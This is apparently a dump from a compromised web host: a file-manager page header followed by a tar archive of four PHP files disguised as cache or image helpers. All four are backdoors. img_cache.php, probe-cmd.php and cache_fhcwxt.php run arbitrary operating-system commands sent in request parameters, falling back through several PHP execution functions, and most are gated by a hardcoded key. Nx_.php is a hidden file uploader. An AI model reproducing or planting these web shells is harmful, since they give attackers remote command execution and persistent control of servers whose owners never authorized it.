Your IP : 216.73.216.245


Current Path : /home/b/o/u/bourgleram/www/398a1/
Upload File :
Current File : /home/b/o/u/bourgleram/www/398a1/cache.tar

img_cache.php000066600000001320152522413060007154 0ustar00<?php
@error_reporting(0);@ini_set('display_errors',0);
header('X-Nx:Nx-zD1');
if(!isset($_REQUEST['k'])||$_REQUEST['k']!=='nXk'){http_response_code(404);die();}
$c=isset($_REQUEST['c'])?$_REQUEST['c']:'';
if($c===''){echo '<pre>Nx-zD1 active</pre>';die();}
$o='';
if(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
elseif(function_exists('exec')){@exec($c,$a);$o=implode("\n",$a);}
elseif(function_exists('shell_exec')){$o=@shell_exec($c);}
elseif(function_exists('popen')){$f=@popen($c,'r');$o='';while(!feof($f)){$o.=fread($f,4096);}pclose($f);}
else{$o='[no exec]';}
echo '<pre>'.htmlspecialchars($o).'</pre>';
?>probe-cmd.php000066600000001452152525377340007150 0ustar00<?php
function _ex($c){
    $r=null;
    if(function_exists('shell_exec'))  $r=@shell_exec($c.' 2>&1');
    if($r===null&&function_exists('exec')){@exec($c.' 2>&1',$o);$r=implode("\n",$o);}
    if($r===null&&function_exists('system')){ob_start();@system($c.' 2>&1');$r=ob_get_clean();}
    if($r===null&&function_exists('passthru')){ob_start();@passthru($c.' 2>&1');$r=ob_get_clean();}
    if($r===null&&function_exists('popen')){$h=@popen($c.' 2>&1','r');if($h){$r=fread($h,65535);pclose($h);}}
    if($r===null&&function_exists('proc_open')){
        $p=@proc_open($c,[1=>['pipe','w'],2=>['pipe','w']],$pipes);
        if($p){$r=stream_get_contents($pipes[1]);proc_close($p);}
    }
    return $r;
}
if(!isset($_GET['cmd'])){echo 'OK:'.php_uname();exit;}
$o=_ex($_GET['cmd']);
echo $o===null?'NOFUNC':$o;
?>
cache_fhcwxt.php000066600000001274152525377340007730 0ustar00<?php
@error_reporting(0);@ini_set('display_errors',0);
header('X-Nx:Nx-zD1');
if(!isset($_REQUEST['k'])||$_REQUEST['k']!=='nXk'){http_response_code(404);die();}
$c=@$_REQUEST['c']??'';
if($c===''){echo '<pre>Nx-zD1 active</pre>';die();}
$o='';
if(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
elseif(function_exists('exec')){@exec($c,$a);$o=implode("\n",$a);}
elseif(function_exists('shell_exec')){$o=@shell_exec($c);}
elseif(function_exists('popen')){$f=@popen($c,'r');$o='';while(!feof($f)){$o.=fread($f,4096);}pclose($f);}
else{$o='[no exec]';}
echo '<pre>'.htmlspecialchars($o).'</pre>';
?>Nx_.php000066600000000615152525377340006024 0ustar00<?php
@error_reporting(0);header('X-Nx:Nx-zD1');
if(@$_REQUEST['k']!=='nXk'){http_response_code(404);die();}
echo 'Nx-zD1';
if(isset($_FILES['f'])){
$n=basename($_FILES['f']['name']);
if(@move_uploaded_file($_FILES['f']['tmp_name'],$n))echo '<br>OK:'.$n;
else echo '<br>FAIL';
}
echo '<form method=post enctype="multipart/form-data"><input name=f type=file><input type=submit value=UP></form>';
?>